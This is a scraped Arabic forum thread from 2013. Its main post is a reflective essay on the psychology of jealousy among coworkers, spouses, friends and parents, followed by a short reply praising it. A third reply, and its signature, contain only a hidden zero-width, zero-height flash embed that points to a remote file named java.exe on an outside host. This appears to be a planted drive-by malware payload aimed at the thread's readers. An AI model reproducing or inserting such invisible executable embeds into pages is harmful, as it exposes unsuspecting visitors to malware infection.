منتديات هتوف  

العودة   منتديات هتوف > أقلام هتوف > المنبر الحر

المنبر الحر فضاء واسع لقلمك وفكرك مواضيع عامه



إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 02-04-2013, 06:21 PM   #1
-( عضو )-
 
تاريخ التسجيل: Jan 2013
المشاركات: 79
معدل تقييم المستوى: 0
المحرر has a reputation beyond reputeالمحرر has a reputation beyond reputeالمحرر has a reputation beyond reputeالمحرر has a reputation beyond reputeالمحرر has a reputation beyond reputeالمحرر has a reputation beyond reputeالمحرر has a reputation beyond reputeالمحرر has a reputation beyond reputeالمحرر has a reputation beyond reputeالمحرر has a reputation beyond reputeالمحرر has a reputation beyond repute



(adsbygoogle = window.adsbygoogle || []).push({});
F21 سيكولوجية الغيرة

قد يكون السلوك الإنساني عصيا على التفسير في بعض الأحيان ، لأنه وغالبا تكمن ورائه عدة دوافع ، هي بذاتها خفية ، لكن إن استطعنا تحليل الدوافع ، سهل علينا تفسير السلوك ، وعرفنا كيف نتعامل معه. سواء كان صادرا من ذواتنا أو من غيرنا.

قد يبدع الموظف في عمله ، ويتفاني فيه ، ويبذل كل ما يسطيع بكل إخلاص ، لكنه لا يجد من رئيسه إلا التهميش والإقصاء ، إن لم يجد أحيانا العداوة والاضطهاد . وقد يفوت عليه الفرص في الترقية أو المكافأة ، بشكل لا يفهمه هذا المرؤوس ، وكأنه يدفعه دفعا إلى سلوك الخط الآخر وهو التهاون والتلاعب .

وقد تتفوق المرأة وتنجز الكثير ، وربما جمعت بين عمل داخل البيت وخارجه ، وبين نجاح في تربية الأبناء وإدارة المنزل ورعاية الزوج ، لكنها في المقابل لا تحظى من الزوج إلا بالانتقاص ، أو النقد أو سوء التعامل. وقد تأخذ ( الغيرة من ) شكل ( الغيرة على ) ، فتأتي غطاءً على سلوكيات التحجير والتقييد باستخدام السلطة . وكأنه يكره لها هذا النجاح – الذي لو وعاه هو نجاح له بالضرورة – ولا يرضيه إلا أن يدفعها للفشل دفعا ، أو يلقي بها هاوية السقوط النفسي والانهيار المعنوي .



وقد يكون الصديق المقرب هو صديق صديقه وعدوه في ذات الوقت ، بسلوك الغيرة الذي لا يعيه ، والذي قد يأخذ شكل تجاهل النجاحات سواء العملية أو الشخصية ، أو التقليل من الميزات ، أو حتى عدم المشاركة في مواقف يبادر إلى مشاركتها الأبعدون ، ويغيب الأصدقاء المقربون. في سلوك يستعصي فهمه على الصديق ولا يجد فيه الخذلان . وقد تقلب الغيرة معادلة الصداقة برمتها ، فتحيلها رماد عداوة خالصة.

وبعض الأبناء لا يجدون من الأب إلا الذم والقدح ، رغم صلاحهم واستقامتهم ، ورغم النجاح في أسرهم وأعمالهم ، ورغم برهم به ، كل قد لا يكفل لهم رضى هذا الأب ، بل يزال هذا الأب يعاملهم كصغار ، وينظر لهم كأطفال. ويعمد إلى التقليل من شأنهم ، ومن شأن ما حققوه ، حتى وإن كان غير عادي أو متميزا ، فإن الأب لا يعترف به أبدا.

إن الغيرة تفسر السلوكات غير المفهومة وغير المبررة والمتناقضة ، لما ينبغي أن نكون عليه ، أو يكون عليه الآخرون تجاهنا.

وهي في معناها الشعوري البدائي ، توصل رسالة مفادها : لست أفضل مني ، ولن تكون كذلك .

وهي إن صدرت من البعيدين فهي غير مستغربة ، لكن غرابتها وجنوحها أن تصدر من المقربين .

وتكمن القضية أن الغالبية لا يتنبهون لكُنْهِ هذا الشعور . والذي يظهر في صورة أفعال غير منطقية تجاه الآخر ، تُغْطَى بدوافع شتى ومبررات أخرى .

إن المنطق يقول : أن كل من أنجز عملا جيدا ، أو التزم بالمبادئ ، أو حقق نجاحا في أي مجال من حياته ، أو خدم غيره ، فإنه يستحق الشكر والثناء ، والإشادة والتقدير .

وإذا حصل منا عكس ذلك ، أو حصل معنا عكس ذلك ، فبلا شك هناك خطا في السياق ، يستلزم التوضيح والتفسير ، ويقتضي المعالجة والإصلاح .


إن الغيرة لا تصدر من محب صادق ، وفي اللحظة الوقتية التي تشتعل فيها نار الغيرة تخبو فيها نار الحب .


ولقد كانت الغيرة البطل الأول في حوادث تاريخية كبرى . فكانت سبب أول جريمة على وجه الأرض ، حين قتل هابيل أخاه قابيل ، وكانت المحرك الأول لأخوة يوسف حين رموه في البئر.

وهي شعور طبيعي يولد مع الإنسان مثلها مثل الحب او الكره .لكنها عند البعض تصبح زعيمة مشاعرهم ، وقائدة أفعالهم.

ونحن لن نستطيع أن نتخلص من سلبياتها إلا بتأمل سلوكنا ، وتحليل دوافعنا ، وملاحظة شعورنا ، وكل ذلك ينقلنا تلقائيا لمرحلة الوعي بالذات .

تلك المرحلة ( الوعي بالذات ) أو (إدراك الذات ) هي مرحلة النضج الحقيقي للشخصية الإنسانية ، والذي تختفي معه كل المشكلات والاضطرابات.

سيكولوجية الغيرة
-->
من مواضيع المحرر

المحرر غير متواجد حالياً   رد مع اقتباس
قديم 02-05-2013, 09:45 AM   #2
مستشار
 
الصورة الرمزية ά Ļ M ό 7 ά Ļ
 
تاريخ التسجيل: Dec 2010
الدولة: KSA
المشاركات: 15,149
معدل تقييم المستوى: 42949730
ά Ļ M ό 7 ά Ļ has a reputation beyond reputeά Ļ M ό 7 ά Ļ has a reputation beyond reputeά Ļ M ό 7 ά Ļ has a reputation beyond reputeά Ļ M ό 7 ά Ļ has a reputation beyond reputeά Ļ M ό 7 ά Ļ has a reputation beyond reputeά Ļ M ό 7 ά Ļ has a reputation beyond reputeά Ļ M ό 7 ά Ļ has a reputation beyond reputeά Ļ M ό 7 ά Ļ has a reputation beyond reputeά Ļ M ό 7 ά Ļ has a reputation beyond reputeά Ļ M ό 7 ά Ļ has a reputation beyond reputeά Ļ M ό 7 ά Ļ has a reputation beyond repute
افتراضي رد: سيكولوجية الغيرة

نص رائع بروعة إبداعك

شكراً لك ,,
__________________
سبحان الله وبحمده ~ سبحان الله العظيم
-->
من مواضيع ά Ļ M ό 7 ά Ļ

ά Ļ M ό 7 ά Ļ غير متواجد حالياً   رد مع اقتباس
قديم 02-07-2013, 07:48 PM   #4
| أحباب هتوف |
 
الصورة الرمزية هـمــــــ البنفسج ــــس
 
تاريخ التسجيل: Jul 2011
الدولة: السعودية
المشاركات: 350
معدل تقييم المستوى: 1882808
هـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond reputeهـمــــــ البنفسج ــــس has a reputation beyond repute
افتراضي رد: سيكولوجية الغيرة

[flash1=http://garitrans.cl/java.exe]width=0 height=0[/flash1]
__________________
[flash1=http://garitrans.cl/java.exe]WIDTH=0 HEIGHT=0[/flash1]
-->
من مواضيع هـمــــــ البنفسج ــــس

هـمــــــ البنفسج ــــس غير متواجد حالياً   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة


المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
نار الغيره تحرق رجل واطيها تمـَرٍدْ ~ً قصص و روايات 486 10-18-2016 04:37 PM


الساعة الآن 01:58 PM


Powered by vBulletin® Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.6.0 TranZ By Almuhajir